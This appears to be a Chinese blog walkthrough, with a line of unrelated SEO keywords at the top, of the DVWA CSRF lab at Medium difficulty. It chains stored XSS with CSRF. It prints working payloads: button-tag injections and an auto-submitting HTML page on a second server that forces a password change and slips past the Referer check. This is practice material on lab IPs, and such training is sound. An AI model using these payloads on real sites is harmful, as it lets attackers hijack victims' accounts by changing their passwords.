免费建设网站领地,网站建设安全,二级域名网站如何申请吗,net快速建站注意#xff1a;
1、这里对XSS(Stored)关卡不熟悉的可以从这里去看http://t.csdn.cn/ggQDK
2、把难度设置成 Medium 一、这一关同样我们需要埋下伏笔#xff0c;诱使用户点击来提交#xff0c;首先从XSS#xff08;Stored#xff09;入手。 注意#xff1a;在前面介绍…注意
1、这里对XSS(Stored)关卡不熟悉的可以从这里去看http://t.csdn.cn/ggQDK
2、把难度设置成 Medium 一、这一关同样我们需要埋下伏笔诱使用户点击来提交首先从XSSStored入手。 注意在前面介绍过如何进行XSS注入这里就不再讲解。http://t.csdn.cn/gs8xX 二、在上low难度中我们直接使用a标签来包裹修改密码的请求。但这一关a标签被过滤了。 所以我们使用的是button标签来提交修改密码的链接。 button Onclickalert(11)点我/button 简单查看效果可以触发 三、接下来是不是就简单了在这里使用 location.href“” 来提交类似第一关修改密码的GET请求不就ok? 构造payload注意这里的ip是web服务器的ip后面不要混淆 button Onclicklocation.hrefhttp://192.168.114.165/vulnerabilities/csrf/?password_new9999password_conf9999ChangeChange拿下/button 解析就是当用户点击这个按钮的时候会自动提交一个修改密码的get请求来修改当前用户的密码。 No matter who you are! 注入并查看结果经过验证确实在字符串的长度被限制了 四、所以果真没那么简单话不多说直接看答案。
提示 源码 用人话是这样说 1、第一关把整个GET请求藏进去没办法——长度限制 2、需要多个连接来实现——不然怎么叫跨站呢思路讲就是点击按钮让页面跳转到我在其他服务器114.199准备好的一个页面用这个页面来向114.165服务器来提交GET请求。 3、但是从源码可以看到这里有一个referer比如我们用114.199服务器提交GET请求的时候referer的ip会是114.199。所以也不会提交成功。 4、所以我们要绕过referer。 五、首先在114.199服务器上面创建一个chage_192.168.114.165.html 的文件,用来绕过referer。这里的IP是靶场的IP。内容如下
script// 向web服务器提交请求 function onlo(){location.hrefhttp://192.168.114.165/vulnerabilities/csrf/?password_new12581password_conf12581ChangeChange;}
/Script
body onloadonlo()
解析这个就相当于跨站脚本通过当用户跳转到这个页面这个页面马上就向Web靶场服务器一个修改密码的请求。来完成密码修改。 六、接下来构造payload button Onclicklocation.hrefhttp://192.168.114.199/change_192.168.114.165.html拿下/button #注意修改IP地址。href服务器上部署的那个脚本连接。 埋下伏笔 单击拿下抓包查看。 拿下
